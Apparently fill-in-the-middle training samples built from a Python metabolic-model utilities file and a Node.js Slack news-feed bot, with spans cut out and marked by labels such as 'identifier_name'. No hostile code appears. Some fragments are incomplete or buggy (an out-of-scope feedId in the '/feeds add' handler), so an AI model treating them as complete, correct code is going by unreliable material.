for element, count in iteritems(metabolite.elements):
metabolite_elements[element] += coefficient * count
return {k: v for k, v in iteritems(metabolite_elements) if v != 0}
def reaction_string(stoichiometry, use_metabolite_names=True):
"""Generate the reaction string """
attrib = "id"
if use_metabolite_names:
attrib = "name"
educts = [(str(abs(value)), getattr(key, attrib)) for key, value in iteritems(stoichiometry) if value < 0.]
products = [(str(abs(value)), getattr(key, attrib)) for key, value in iteritems(stoichiometry) if value > 0.]
return " + ".join([" ".join(x) for x in educts])+" --> "+" + ".join([" ".join(x) for x in products])
def | (in_dict):
substrings = ['{0}: {1:.1f}'.format(*x) for x in in_dict.items()]
return "<br>".join(substrings)
def reaction_balance(metabolites):
""" Check the balancing status of the stoichiometry
Parameters
----------
metabolites : dict - Dictionary of metabolites with stoichiometric coefficnets
Returns
-------
charge_str : str or bool
element_str : str or bool
balanced : str or bool
"""
element_result = check_element_balance(metabolites)
charge_result = check_charge_balance(metabolites)
if charge_result is None:
charge_str = "Unknown"
elif charge_result == 0:
charge_str = "OK"
else:
charge_str = str(charge_result)
if not all(x.formula for x in metabolites.keys()):
element_str = "Unknown"
elif element_result == {}:
element_str = "OK"
else:
element_str = unbalanced_metabolites_to_string(element_result)
if len(metabolites) < 2:
balanced = None
elif element_str == "OK" and charge_str == "OK":
balanced = True
elif element_str not in ("OK", "Unknown") or charge_str not in ("OK", "Unknown"):
balanced = False
else:
balanced = "Unknown"
return charge_str, element_str, balanced
def merge_groups_by_overlap(data):
""" Merge sets
Parameters
----------
data: list
Returns
-------
"""
new_index = list(range(len(data)))
mapping = dict()
data = [set(m) for m in data]
# Iterate over groups in data and merge groups
# to the one with the lowest index
for i, group in enumerate(data):
for element in group:
if element not in mapping:
# Element has not been seen before
# point element to current index
mapping[element] = i
continue
else:
# Get the new location location of the group
# to which the element mapping points
destination = new_location(new_index, mapping[element])
if destination == i:
# Group has already been merged
continue
elif destination > i:
# Merge to lowest index always
destination, i = i, destination
# Merge current group with the one
# the item has been found in before
data[destination].update(data[i])
data[i] = None
# Store new index of group
new_index[i] = destination
i = destination
# Filter out the empty groups
return [g for g in data if g]
def new_location(new_index, n):
""" Find new location
Iteratively follow pointers to new location.
Parameters
----------
new_index: list, Should be initialized from range
n: int
Returns
-------
int
"""
while new_index[n] != n:
n = new_index[n]
return n
def unpack(iterable, cls):
""" Unpack the value
Parameters
----------
iterable
cls
Returns
-------
"""
if len(iterable) == 1:
return iterable.pop()
else:
return cls(iterable)
def text_is_different(input, state):
""" Check if the input is different from output
Test if the input is different to the output
while ignoring the difference between None
and empty string.
Parameters
----------
input: str or None
state: str
Returns
-------
bool
"""
if not input and not state:
return False
else:
return input != state
def restore_state(object, state):
""" Restore the state of an object
Parameters
----------
object: Object which should be restored
state: State from settings
Returns
-------
"""
if state:
object.restoreState(state)
def restore_geometry(object, state):
""" Restore the geometry of an object
Parameters
----------
object: Object which should be restored
state: State from settings
Returns
-------
"""
if state:
object.restoreGeometry(state)
def split_dict_by_value(dictionary):
""" Split dictionary by values
This functions splits dictionary entries based
on the value into positive, negative and zero
dictionaries.
Parameters
----------
dictionary: dict,
Input dictionary
Returns
-------
positive: dict,
Dictionary containg all items with positive value
negative: dict,
Dictionary cotaining all items with negative value
zero: dict,
Dictionary containing all items with zero value
"""
positive, negative, zero = {}, {}, {}
for k, v in dictionary.items():
if v > 0.:
positive[k] = v
elif v < 0.:
negative[k] = v
else:
zero[k] = v
return positive, negative, zero
| unbalanced_metabolites_to_string | identifier_name |
functions.py | from collections import defaultdict
from six import iteritems
def invert_mapping(mapping):
""" Invert a mapping dictionary
Parameters
----------
mapping: dict
Returns
-------
"""
inverted_mapping = defaultdict(list)
for key, value in mapping.items():
if isinstance(value, (list, set)):
for element in value:
|
else:
inverted_mapping[value].append(key)
return inverted_mapping
def generate_copy_id(base_id, collection, suffix="_copy"):
""" Generate a new id that is not present in collection
Parameters
----------
base_id: str, Original id while copying or New for new entries
collection: dict or list
suffix: str, Suffix that is added to the base id
Returns
-------
"""
composite_id = str(base_id) + suffix
new_id = composite_id
n = 0
# Make sure there is no metabolite with the same id
while new_id in collection:
# Add number to end of id
n += 1
new_id = composite_id + str(n)
return new_id
def get_annotation_to_item_map(list_of_items):
""" Find model items with overlapping annotations
Parameters
----------
item
list_of_items
Returns
-------
"""
annotation_to_item = defaultdict(list)
for item in list_of_items:
for annotation in item.annotation:
annotation_to_item[annotation].append(item)
return annotation_to_item
def convert_to_bool(input_str):
""" Convert string of boolean value to actual bolean
PyQt5 stores boolean values as strings 'true' and 'false
in the settings. In order to use those stored values
they need to be converted back to the boolean values.
Parameters
----------
input_str: str
Returns
-------
bool
"""
mapping = {"true": True,
"false": False,
"none": None}
if isinstance(input_str, bool):
return input_str
elif not isinstance(input_str, str):
raise TypeError("Input should be a string or boolean")
else:
return mapping[input_str.lower()]
def check_charge_balance(metabolites):
""" Check charge balance of the reaction """
# Check that charge is set for all metabolites
if not all(x.charge is not None for x in metabolites.keys()):
return None
else:
return sum([metabolite.charge * coefficient for metabolite, coefficient in iteritems(metabolites)])
def check_element_balance(metabolites):
""" Check that the reaction is elementally balanced """
metabolite_elements = defaultdict(int)
for metabolite, coefficient in iteritems(metabolites):
for element, count in iteritems(metabolite.elements):
metabolite_elements[element] += coefficient * count
return {k: v for k, v in iteritems(metabolite_elements) if v != 0}
def reaction_string(stoichiometry, use_metabolite_names=True):
"""Generate the reaction string """
attrib = "id"
if use_metabolite_names:
attrib = "name"
educts = [(str(abs(value)), getattr(key, attrib)) for key, value in iteritems(stoichiometry) if value < 0.]
products = [(str(abs(value)), getattr(key, attrib)) for key, value in iteritems(stoichiometry) if value > 0.]
return " + ".join([" ".join(x) for x in educts])+" --> "+" + ".join([" ".join(x) for x in products])
def unbalanced_metabolites_to_string(in_dict):
substrings = ['{0}: {1:.1f}'.format(*x) for x in in_dict.items()]
return "<br>".join(substrings)
def reaction_balance(metabolites):
""" Check the balancing status of the stoichiometry
Parameters
----------
metabolites : dict - Dictionary of metabolites with stoichiometric coefficnets
Returns
-------
charge_str : str or bool
element_str : str or bool
balanced : str or bool
"""
element_result = check_element_balance(metabolites)
charge_result = check_charge_balance(metabolites)
if charge_result is None:
charge_str = "Unknown"
elif charge_result == 0:
charge_str = "OK"
else:
charge_str = str(charge_result)
if not all(x.formula for x in metabolites.keys()):
element_str = "Unknown"
elif element_result == {}:
element_str = "OK"
else:
element_str = unbalanced_metabolites_to_string(element_result)
if len(metabolites) < 2:
balanced = None
elif element_str == "OK" and charge_str == "OK":
balanced = True
elif element_str not in ("OK", "Unknown") or charge_str not in ("OK", "Unknown"):
balanced = False
else:
balanced = "Unknown"
return charge_str, element_str, balanced
def merge_groups_by_overlap(data):
""" Merge sets
Parameters
----------
data: list
Returns
-------
"""
new_index = list(range(len(data)))
mapping = dict()
data = [set(m) for m in data]
# Iterate over groups in data and merge groups
# to the one with the lowest index
for i, group in enumerate(data):
for element in group:
if element not in mapping:
# Element has not been seen before
# point element to current index
mapping[element] = i
continue
else:
# Get the new location location of the group
# to which the element mapping points
destination = new_location(new_index, mapping[element])
if destination == i:
# Group has already been merged
continue
elif destination > i:
# Merge to lowest index always
destination, i = i, destination
# Merge current group with the one
# the item has been found in before
data[destination].update(data[i])
data[i] = None
# Store new index of group
new_index[i] = destination
i = destination
# Filter out the empty groups
return [g for g in data if g]
def new_location(new_index, n):
""" Find new location
Iteratively follow pointers to new location.
Parameters
----------
new_index: list, Should be initialized from range
n: int
Returns
-------
int
"""
while new_index[n] != n:
n = new_index[n]
return n
def unpack(iterable, cls):
""" Unpack the value
Parameters
----------
iterable
cls
Returns
-------
"""
if len(iterable) == 1:
return iterable.pop()
else:
return cls(iterable)
def text_is_different(input, state):
""" Check if the input is different from output
Test if the input is different to the output
while ignoring the difference between None
and empty string.
Parameters
----------
input: str or None
state: str
Returns
-------
bool
"""
if not input and not state:
return False
else:
return input != state
def restore_state(object, state):
""" Restore the state of an object
Parameters
----------
object: Object which should be restored
state: State from settings
Returns
-------
"""
if state:
object.restoreState(state)
def restore_geometry(object, state):
""" Restore the geometry of an object
Parameters
----------
object: Object which should be restored
state: State from settings
Returns
-------
"""
if state:
object.restoreGeometry(state)
def split_dict_by_value(dictionary):
""" Split dictionary by values
This functions splits dictionary entries based
on the value into positive, negative and zero
dictionaries.
Parameters
----------
dictionary: dict,
Input dictionary
Returns
-------
positive: dict,
Dictionary containg all items with positive value
negative: dict,
Dictionary cotaining all items with negative value
zero: dict,
Dictionary containing all items with zero value
"""
positive, negative, zero = {}, {}, {}
for k, v in dictionary.items():
if v > 0.:
positive[k] = v
elif v < 0.:
negative[k] = v
else:
zero[k] = v
return positive, negative, zero
| inverted_mapping[element].append(key) | conditional_block |
server.js | (", ")) {
req.body.companies = req.body.companies.replace(/,/g, ", ")
}
fields.push({
title: "Companies",
short: false,
value: req.body.companies
})
}
if (req.body.word_count) {
var length = req.body.word_count
var prefix = ""
if (length > 1000 )
prefix = ":snail: "
else if (length < 300)
prefix = ":fast_forward: "
fields.push({
title: "Length",
short: true,
value: `${prefix}${length} words`
})
}
if (req.body.shares) {
fields.push({
title: "Shares",
short: true,
value: formatCount(req.body.shares)
})
}
if (req.body.sentiment) {
var sentiment
switch (req.body.sentiment) {
case "negative":
sentiment = ":rage: Negative";
break;
case "positive":
sentiment = ":smile: Positive";
break;
case "neutral":
sentiment = "Neutral"
break;
}
fields.push({
title: "Sentiment",
short: true,
value: sentiment
})
}
// Unsupported for now
// fields.push({
// "title": "Sponsored",
// "value": ":warning: Undetected",
// "short": true
// })
attachment.fields = fields
slackAPIClient.send('chat.postMessage',
{
channel,
attachments: [attachment]
},
(err, response) => {
if (err) {
console.log(err)
res.status(500).send(err)
} else {
res.status(201).send(response)
}
}
)
}
)
slapp.command('/feeds', 'list', (msg, text) => {
ncClient.list().then (feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`*Here is the list of all feeds:*\n${lines.join("\n")}`)
})
})
slapp.command('/feeds', /connect (\d+)/, (msg, text, id) => {
msg.respond(`To connect a feed to this channel, please just put the id (${id}) as the channel topic (at the top)`)
})
slapp.command('/feeds', 'create (.+)', (msg, text, name) => {
ncClient.create(name).then(() => {
return ncClient.list()
}).then(feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`:white_check_mark: Successfully created feed ${name}, here is the list of all feeds:\n${lines.join("\n")}`)
}).catch(() => {
msg.respond("Error creating feed")
})
})
slapp.command('/feeds', 'add (.+)', (msg, text, url) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return new Promise ((resolve, reject) => {
ncClient.add(feedId, url).then(() => { resolve(feedId)}).catch(e => { reject(e)})
})
}).then(() => {
ncClient.listSources(feedId)
}).then(result => {
var lines = result.sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') {
return `Search: "${source.source.keywords}"`
} else if (source.source.type == 'channel') {
return `Channel: ${source.source.id}. ${source.source.name}`
}
})
msg.respond(`:white_check_mark: Successfully added source ${url}, here is the list of all sources in the feed now:\n${lines.join("\n")}`)
}).catch((e) => {
console.log(e)
msg.respond("Error adding source")
})
})
slapp.command('/feeds', 'sources', (msg, text) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return ncClient.listSources(feedId)
}).then(sources => {
var lines = sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') {
return `Search: "${source.source.keywords}"`
} else if (source.source.type == 'channel') {
return `Channel: ${source.source.id}. ${source.source.name}`
}
})
msg.respond(`*Here is a list of all sources in the current feed:*\n${lines.join("\n")}`)
})
})
slapp.command('/feeds', '(help)?', (msg, text) => {
msg.respond(`Valid commands: \`list\`, \`connect\`, \`create\`, \`add\`, \`sources\`, \`help\`.
To show the currently connected feed: \`/feeds\`
To list all available feeds: \`/feeds list\`
To connect a feed to this channel: \`/feeds connect <id>\` (Take ID from /feeds list)
To create and connect a new feed: \`/feeds create <name>\`
To add an RSS source to the connected feed: \`/feeds add <url>\`
To list the sources in the connected feed: \`/feeds sources\``)
})
slapp.action('share', 'post', (msg, value) => {
var sharedInChannel = true
if (!value) {
sharedInChannel = false
value = msg.body.actions[0].selected_options[0].value
}
var url = msg.body.original_message.attachments[0].title_link
var userId = msg.body.user.id
var originalMsg = msg.body.original_message;
var chosenAttachment = originalMsg.attachments[msg.body.attachment_id - 1]
addUrlToChannel(value, url)
.then(() => {
var attachment = {
color: '#006600',
text: `${url}
:postbox: Article posted to channel ${value} by <@${userId}>`
}
originalMsg.attachments = []
if (!sharedInChannel) {
originalMsg.attachments.push(chosenAttachment)
}
originalMsg.attachments.push(attachment)
msg.respond(msg.body.response_url, originalMsg)
})
.catch((err) => {
console.log(err)
chosenAttachment.color = '#ff9933'
var lastAttachment = {
pretext: `:exclamation: Error posting article to channel ${value}`
}
originalMsg.attachments = [chosenAttachment, lastAttachment]
msg.respond(msg.body.response_url, originalMsg)
})
})
function getConnectedFeedId(channelId) {
return new Promise((resolve, reject) => {
slackAPIClient.send('channels.info',
{
channel: channelId
},
(err, response) => {
if (err) return reject(err)
resolve(response.channel.topic.value)
}
)
})
}
function addUrlToChannel(channelId, url) {
return new Promise((resolve, reject) => {
request.post('http://itao-server-55663464.eu-central-1.elb.amazonaws.com/itao/item/add/url',
{body: url}, (err, res, body) => {
if (err) return reject(err);
try {
JSON.parse(body)[0]
console.log(`Successfully created item ${url}: ${body}`)
} catch (err) {
return reject(err + JSON.stringify(body));
}
var payload = {
channel_id: channelId,
url: url
}
request.post('http://itao-server-55663464.eu-central-1.elb.amazonaws.com/itao/channel/item/add',
{ json: payload}, (err2, res2, body2) => {
if (err2) return reject(err);
try {
var success = body2.success
if (!success) return reject(`Error posting to http://itao-server-55663464.eu-central-1.elb.amazonaws.com/itao/channel/item/add with body ${JSON.stringify(payload)}
Got back ${JSON.stringify(body2)}`);
} catch (err) {
return reject(err + JSON.stringify(body));
}
resolve();
})
})
})
}
slapp.action('share', 'discard', (msg, value) => {
var originalMsg = msg.body.original_message
var url = msg.body.original_message.attachments[0].title_link
var userId = msg.body.user.id
var chosenAttachment = originalMsg.attachments[msg.body.attachment_id - 1]
chosenAttachment.actions = []
var attachment = {
color: '#800000',
text: `${url}
:no_entry: Article discarded by <@${userId}>`,
}
originalMsg.attachments = [attachment]
msg.respond(msg.body.response_url, originalMsg)
})
function | fetchChannels | identifier_name |
|
server.js | "text":"136 - IBM in the Media",
"value":136
},
{
"text":"151 - Randstad in the News",
"value":151
},
{
"text":"152 - Randstad Market Watch",
"value":152
},
{
"text":"170 - IBM Cloud Market Watch",
"value":170
},
{
"text":"219 - IBM Developer Advocates",
"value":219
},
{
"text":"250 - Achmea Transport",
"value":250
},
{
"text":"251 - Achmea Automotive",
"value":251
},
{
"text":"253 - Achmea Innovation",
"value":253
}
]
}
]
}
if (req.body.host) {
attachment.author_name = req.body.host;
attachment.author_link = `http://${req.body.host}`;
}
if (req.body.summary) {
attachment.text = req.body.summary
}
if (req.body.image_url) {
attachment.image_url = req.body.image_url
}
if (req.body.pub_date) {
attachment.ts = Date.parse(req.body.pub_date) / 1000
}
// Populating fields
var fields = []
if (req.body.keywords) {
if (!req.body.keywords.includes(", ")) {
req.body.keywords = req.body.keywords.replace(/,/g, ", ")
}
fields.push({
title: "Keywords",
short: false,
value: req.body.keywords
})
}
if (req.body.companies) {
if (!req.body.companies.includes(", ")) {
req.body.companies = req.body.companies.replace(/,/g, ", ")
}
fields.push({
title: "Companies",
short: false,
value: req.body.companies
})
}
if (req.body.word_count) {
var length = req.body.word_count
var prefix = ""
if (length > 1000 )
prefix = ":snail: "
else if (length < 300)
prefix = ":fast_forward: "
fields.push({
title: "Length",
short: true,
value: `${prefix}${length} words`
})
}
if (req.body.shares) {
fields.push({
title: "Shares",
short: true,
value: formatCount(req.body.shares)
})
}
if (req.body.sentiment) {
var sentiment
switch (req.body.sentiment) {
case "negative":
sentiment = ":rage: Negative";
break;
case "positive":
sentiment = ":smile: Positive";
break;
case "neutral":
sentiment = "Neutral"
break;
}
fields.push({
title: "Sentiment",
short: true,
value: sentiment
})
}
// Unsupported for now
// fields.push({
// "title": "Sponsored",
// "value": ":warning: Undetected",
// "short": true
// })
attachment.fields = fields
slackAPIClient.send('chat.postMessage',
{
channel,
attachments: [attachment]
},
(err, response) => {
if (err) {
console.log(err)
res.status(500).send(err)
} else {
res.status(201).send(response)
}
}
)
}
)
slapp.command('/feeds', 'list', (msg, text) => {
ncClient.list().then (feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`*Here is the list of all feeds:*\n${lines.join("\n")}`)
})
})
slapp.command('/feeds', /connect (\d+)/, (msg, text, id) => {
msg.respond(`To connect a feed to this channel, please just put the id (${id}) as the channel topic (at the top)`)
})
slapp.command('/feeds', 'create (.+)', (msg, text, name) => {
ncClient.create(name).then(() => {
return ncClient.list()
}).then(feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`:white_check_mark: Successfully created feed ${name}, here is the list of all feeds:\n${lines.join("\n")}`)
}).catch(() => {
msg.respond("Error creating feed")
})
})
slapp.command('/feeds', 'add (.+)', (msg, text, url) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return new Promise ((resolve, reject) => {
ncClient.add(feedId, url).then(() => { resolve(feedId)}).catch(e => { reject(e)})
})
}).then(() => {
ncClient.listSources(feedId)
}).then(result => {
var lines = result.sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') {
return `Search: "${source.source.keywords}"`
} else if (source.source.type == 'channel') {
return `Channel: ${source.source.id}. ${source.source.name}`
}
})
msg.respond(`:white_check_mark: Successfully added source ${url}, here is the list of all sources in the feed now:\n${lines.join("\n")}`)
}).catch((e) => {
console.log(e)
msg.respond("Error adding source")
})
})
slapp.command('/feeds', 'sources', (msg, text) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return ncClient.listSources(feedId)
}).then(sources => {
var lines = sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') {
return `Search: "${source.source.keywords}"`
} else if (source.source.type == 'channel') {
return `Channel: ${source.source.id}. ${source.source.name}`
}
})
msg.respond(`*Here is a list of all sources in the current feed:*\n${lines.join("\n")}`)
})
})
slapp.command('/feeds', '(help)?', (msg, text) => {
msg.respond(`Valid commands: \`list\`, \`connect\`, \`create\`, \`add\`, \`sources\`, \`help\`.
To show the currently connected feed: \`/feeds\`
To list all available feeds: \`/feeds list\`
To connect a feed to this channel: \`/feeds connect <id>\` (Take ID from /feeds list)
To create and connect a new feed: \`/feeds create <name>\`
To add an RSS source to the connected feed: \`/feeds add <url>\`
To list the sources in the connected feed: \`/feeds sources\``)
})
slapp.action('share', 'post', (msg, value) => {
var sharedInChannel = true
if (!value) {
sharedInChannel = false
value = msg.body.actions[0].selected_options[0].value
}
var url = msg.body.original_message.attachments[0].title_link
var userId = msg.body.user.id
var originalMsg = msg.body.original_message;
var chosenAttachment = originalMsg.attachments[msg.body.attachment_id - 1]
addUrlToChannel(value, url)
.then(() => {
var attachment = {
color: '#006600',
text: `${url}
:postbox: Article posted to channel ${value} by <@${userId}>`
}
originalMsg.attachments = []
if (!sharedInChannel) {
originalMsg.attachments.push(chosenAttachment)
}
originalMsg.attachments.push(attachment)
msg.respond(msg.body.response_url, originalMsg)
})
.catch((err) => {
console.log(err)
chosenAttachment.color = '#ff9933'
var lastAttachment = {
pretext: `:exclamation: Error posting article to channel ${value}`
}
originalMsg.attachments = [chosenAttachment, lastAttachment]
msg.respond(msg.body.response_url, originalMsg)
})
})
function getConnectedFeedId(channelId) | {
return new Promise((resolve, reject) => {
slackAPIClient.send('channels.info',
{
channel: channelId
},
(err, response) => {
if (err) return reject(err)
resolve(response.channel.topic.value)
}
)
})
} | identifier_body |
|
server.js | var verifiedIcon = req.body.verified ? "https://cdn3.iconfinder.com/data/icons/basicolor-arrows-checks/24/154_check_ok_sticker_success-512.png" : "http://www.clker.com/cliparts/H/Z/0/R/f/S/warning-icon-hi.png"
var attachment = {
callback_id: "share",
author_icon: verifiedIcon,
title_link: req.body.url,
title: req.body.title,
actions: [
{
"name": "post",
"text": "Post",
"type": "button",
"style": "primary",
"value": channelId
},
{
"name": "discard",
"text": "Discard",
"type": "button",
"style": "danger",
"value": "discarded"
},
{
"name": "post",
"text": "Share to channel...",
"type": "select",
"options": [
{
"text":"1 - Test",
"value":1
},
{
"text":"7 - Digital Marketing",
"value":7
},
{
"text":"40 - Legal",
"value":40
},
{
"text":"43 - Innovation & Startups",
"value":43
},
{
"text":"66 - Journalism",
"value":66
},
{
"text":"76 - Ondernemen",
"value":76
},
{
"text":"82 - Market Trends",
"value":82
},
{
"text":"83 - 9x Awesome Content",
"value":83
},
{
"text":"84 - Business Practices",
"value":84
},
{
"text":"86 - Education Market",
"value":86
},
{
"text":"87 - Venture Capital & Startups",
"value":87
},
{
"text":"89 - Fintech",
"value":89
},
{
"text":"101 - Direct Marketing",
"value":101
},
{
"text":"109 - IT Business",
"value":109
},
{
"text":"116 - NN Algemeen",
"value":116
},
{
"text":"120 - Customer Insights",
"value":120
},
{
"text":"125 - CPS",
"value":125
},
{
"text":"126 - RMS",
"value":126
},
{
"text":"136 - IBM in the Media",
"value":136
},
{
"text":"151 - Randstad in the News",
"value":151
},
{
"text":"152 - Randstad Market Watch",
"value":152
},
{
"text":"170 - IBM Cloud Market Watch",
"value":170
},
{
"text":"219 - IBM Developer Advocates",
"value":219
},
{
"text":"250 - Achmea Transport",
"value":250
},
{
"text":"251 - Achmea Automotive",
"value":251
},
{
"text":"253 - Achmea Innovation",
"value":253
}
]
}
]
}
if (req.body.host) {
attachment.author_name = req.body.host;
attachment.author_link = `http://${req.body.host}`;
}
if (req.body.summary) {
attachment.text = req.body.summary
}
if (req.body.image_url) {
attachment.image_url = req.body.image_url
}
if (req.body.pub_date) {
attachment.ts = Date.parse(req.body.pub_date) / 1000
}
// Populating fields
var fields = []
if (req.body.keywords) {
if (!req.body.keywords.includes(", ")) {
req.body.keywords = req.body.keywords.replace(/,/g, ", ")
}
fields.push({
title: "Keywords",
short: false,
value: req.body.keywords
})
}
if (req.body.companies) {
if (!req.body.companies.includes(", ")) {
req.body.companies = req.body.companies.replace(/,/g, ", ")
}
fields.push({
title: "Companies",
short: false,
value: req.body.companies
})
}
if (req.body.word_count) {
var length = req.body.word_count
var prefix = ""
if (length > 1000 )
prefix = ":snail: "
else if (length < 300)
prefix = ":fast_forward: "
fields.push({
title: "Length",
short: true,
value: `${prefix}${length} words`
})
}
if (req.body.shares) {
fields.push({
title: "Shares",
short: true,
value: formatCount(req.body.shares)
})
}
if (req.body.sentiment) {
var sentiment
switch (req.body.sentiment) {
case "negative":
sentiment = ":rage: Negative";
break;
case "positive":
sentiment = ":smile: Positive";
break;
case "neutral":
sentiment = "Neutral"
break;
}
fields.push({
title: "Sentiment",
short: true,
value: sentiment
})
}
// Unsupported for now
// fields.push({
// "title": "Sponsored",
// "value": ":warning: Undetected",
// "short": true
// })
attachment.fields = fields
slackAPIClient.send('chat.postMessage',
{
channel,
attachments: [attachment]
},
(err, response) => {
if (err) {
console.log(err)
res.status(500).send(err)
} else {
res.status(201).send(response)
}
}
)
}
)
slapp.command('/feeds', 'list', (msg, text) => {
ncClient.list().then (feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`*Here is the list of all feeds:*\n${lines.join("\n")}`)
})
})
slapp.command('/feeds', /connect (\d+)/, (msg, text, id) => {
msg.respond(`To connect a feed to this channel, please just put the id (${id}) as the channel topic (at the top)`)
})
slapp.command('/feeds', 'create (.+)', (msg, text, name) => {
ncClient.create(name).then(() => {
return ncClient.list()
}).then(feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`:white_check_mark: Successfully created feed ${name}, here is the list of all feeds:\n${lines.join("\n")}`)
}).catch(() => {
msg.respond("Error creating feed")
})
})
slapp.command('/feeds', 'add (.+)', (msg, text, url) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return new Promise ((resolve, reject) => {
ncClient.add(feedId, url).then(() => { resolve(feedId)}).catch(e => { reject(e)})
})
}).then(() => {
ncClient.listSources(feedId)
}).then(result => {
var lines = result.sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') {
return `Search: "${source.source.keywords}"`
} else if (source.source.type == 'channel') {
return `Channel: ${source.source.id}. ${source.source.name}`
}
})
msg.respond(`:white_check_mark: Successfully added source ${url}, here is the list of all sources in the feed now:\n${lines.join("\n")}`)
}).catch | random_line_split |
||
server.js | ",
"value": channelId
},
{
"name": "discard",
"text": "Discard",
"type": "button",
"style": "danger",
"value": "discarded"
},
{
"name": "post",
"text": "Share to channel...",
"type": "select",
"options": [
{
"text":"1 - Test",
"value":1
},
{
"text":"7 - Digital Marketing",
"value":7
},
{
"text":"40 - Legal",
"value":40
},
{
"text":"43 - Innovation & Startups",
"value":43
},
{
"text":"66 - Journalism",
"value":66
},
{
"text":"76 - Ondernemen",
"value":76
},
{
"text":"82 - Market Trends",
"value":82
},
{
"text":"83 - 9x Awesome Content",
"value":83
},
{
"text":"84 - Business Practices",
"value":84
},
{
"text":"86 - Education Market",
"value":86
},
{
"text":"87 - Venture Capital & Startups",
"value":87
},
{
"text":"89 - Fintech",
"value":89
},
{
"text":"101 - Direct Marketing",
"value":101
},
{
"text":"109 - IT Business",
"value":109
},
{
"text":"116 - NN Algemeen",
"value":116
},
{
"text":"120 - Customer Insights",
"value":120
},
{
"text":"125 - CPS",
"value":125
},
{
"text":"126 - RMS",
"value":126
},
{
"text":"136 - IBM in the Media",
"value":136
},
{
"text":"151 - Randstad in the News",
"value":151
},
{
"text":"152 - Randstad Market Watch",
"value":152
},
{
"text":"170 - IBM Cloud Market Watch",
"value":170
},
{
"text":"219 - IBM Developer Advocates",
"value":219
},
{
"text":"250 - Achmea Transport",
"value":250
},
{
"text":"251 - Achmea Automotive",
"value":251
},
{
"text":"253 - Achmea Innovation",
"value":253
}
]
}
]
}
if (req.body.host) {
attachment.author_name = req.body.host;
attachment.author_link = `http://${req.body.host}`;
}
if (req.body.summary) {
attachment.text = req.body.summary
}
if (req.body.image_url) {
attachment.image_url = req.body.image_url
}
if (req.body.pub_date) {
attachment.ts = Date.parse(req.body.pub_date) / 1000
}
// Populating fields
var fields = []
if (req.body.keywords) {
if (!req.body.keywords.includes(", ")) {
req.body.keywords = req.body.keywords.replace(/,/g, ", ")
}
fields.push({
title: "Keywords",
short: false,
value: req.body.keywords
})
}
if (req.body.companies) {
if (!req.body.companies.includes(", ")) {
req.body.companies = req.body.companies.replace(/,/g, ", ")
}
fields.push({
title: "Companies",
short: false,
value: req.body.companies
})
}
if (req.body.word_count) {
var length = req.body.word_count
var prefix = ""
if (length > 1000 )
prefix = ":snail: "
else if (length < 300)
prefix = ":fast_forward: "
fields.push({
title: "Length",
short: true,
value: `${prefix}${length} words`
})
}
if (req.body.shares) {
fields.push({
title: "Shares",
short: true,
value: formatCount(req.body.shares)
})
}
if (req.body.sentiment) {
var sentiment
switch (req.body.sentiment) {
case "negative":
sentiment = ":rage: Negative";
break;
case "positive":
sentiment = ":smile: Positive";
break;
case "neutral":
sentiment = "Neutral"
break;
}
fields.push({
title: "Sentiment",
short: true,
value: sentiment
})
}
// Unsupported for now
// fields.push({
// "title": "Sponsored",
// "value": ":warning: Undetected",
// "short": true
// })
attachment.fields = fields
slackAPIClient.send('chat.postMessage',
{
channel,
attachments: [attachment]
},
(err, response) => {
if (err) {
console.log(err)
res.status(500).send(err)
} else {
res.status(201).send(response)
}
}
)
}
)
slapp.command('/feeds', 'list', (msg, text) => {
ncClient.list().then (feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`*Here is the list of all feeds:*\n${lines.join("\n")}`)
})
})
slapp.command('/feeds', /connect (\d+)/, (msg, text, id) => {
msg.respond(`To connect a feed to this channel, please just put the id (${id}) as the channel topic (at the top)`)
})
slapp.command('/feeds', 'create (.+)', (msg, text, name) => {
ncClient.create(name).then(() => {
return ncClient.list()
}).then(feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`:white_check_mark: Successfully created feed ${name}, here is the list of all feeds:\n${lines.join("\n")}`)
}).catch(() => {
msg.respond("Error creating feed")
})
})
slapp.command('/feeds', 'add (.+)', (msg, text, url) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return new Promise ((resolve, reject) => {
ncClient.add(feedId, url).then(() => { resolve(feedId)}).catch(e => { reject(e)})
})
}).then(() => {
ncClient.listSources(feedId)
}).then(result => {
var lines = result.sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') {
return `Search: "${source.source.keywords}"`
} else if (source.source.type == 'channel') {
return `Channel: ${source.source.id}. ${source.source.name}`
}
})
